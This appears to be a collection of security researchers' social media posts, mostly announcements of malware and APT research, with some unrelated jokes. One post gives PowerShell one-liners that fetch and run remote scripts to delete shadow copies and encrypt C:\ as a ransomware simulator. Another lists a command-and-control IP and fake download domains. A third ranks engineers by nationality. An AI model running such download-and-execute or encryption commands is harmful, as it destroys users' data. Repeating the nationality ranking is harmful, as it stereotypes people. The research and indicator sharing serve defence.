A new infection chain we see a lot lately is used to deliver popular malware families Read my technical analysis of the new #SYK #Crypter and it's Discord loader at blog.morphisec.com/syk-crypter-di… VT Collection: virustotal.com/gui/collection…

working on my new simulator: IEX (New-Object Net.WebClient).DownloadString("raw.githubusercontent.com/smgorelik/Rans…"); Invoke-ShadowDeleteSIM -Mode All -Volume 'C:\' IEX (New-Object Net.WebClient).DownloadString("raw.githubusercontent.com/smgorelik/Rans…"); Invoke-RansomSIM -Mode Encrypt -Path 'C:\'

Hope to see some of you tomorrow at BSides Munich 😁✌️

Excited to share our latest research in which we detail a targeted Chinese espionage operation against defense institutes in Russia. The attacks, attributed to a group we call #TwistedPanda, deploy a multi-layered loader and a backdoor dubbed SPINNER. research.checkpoint.com/2022/twisted-p… 🧵>>

Hido Cohen and I recently discovered new changes in the #Donot #APT (AKA #APT-C-35) toolset Moreover, the team used a nice trick to evade the scanning of the remote template by checking if the User-agent contains “MSOffice”. More info: blog.morphisec.com/apt-c-35-new-w… Jazi SKII

#ProxyShellMiner - An ongoing campaign that propagates within enterprise networks by exploiting Windows Exchange servers for initial access. Read more about it here: blog.morphisec.com/proxyshellmine…

Introducing #SYS01 #Stealer - an advanced stealer, packed with multiple stages in Rust, Python, and PHP for evading security solutions. Similar to the recent #S1deload campaigns. Thx to Arnold Osipov for this research Read more here: blog.morphisec.com/sys01stealer-f…

Ongoing #in2al5dp3in4er (invalid printer) loader delivering #Aurora stealer from a #MidJourney themed website. Still #FUD on VirusTotal - 0 detections! C2: 94.142.138[.]218:4561 Fake websites: midj0urney[.]org get.mid-journey[.]org/?gclid More info - blog.morphisec.com/in2al5d-p3in4er

Our new research is one of our best publications in recent years, if you are interested in the malware & threat domain it's a must-read!

Throughout the year, Morphisec has learned much about the Chae$ 4 malware variant. On October 18th, our team will help you understand what is new and how it can impact your business. Reserve your spot at our 45-minute interactive webinar here: bit.ly/3PJOEPE!

Morphisec's Nadav Lorber analyses ResolverRAT, a newly identified remote access trojan that combines advanced in-memory execution, API and resource resolution at runtime, and layered evasion techniques. morphisec.com/blog/new-malwa…

ENGINEER TIER LIST chinese israeli canadian indian french polish <power gap> american spanish

By 'implementing a waitlist' all they did was remove the installer download link from their site 🙄 You can just get the installer from other sources and first-time login will activate it! I'd expect more from AWS 😂

ssl expired. attention didn’t. total mvp! (static sites don’t need it, npcs do)

someone deployed a malware extension for Cursor but seems he forgot to delete promotional messages and the clear-text payload lol extra loot: download booster script

Sam Altman Smarter! I can go for a nice walk or something it's okay.

One way to differentiate a real nerd from a phony nerd is their appreciation of stuff For example, someone may share an idea, or proof-of-concept, which illustrates something which is unusual A nerd will appreciate it for it's documentation and appreciation that someone has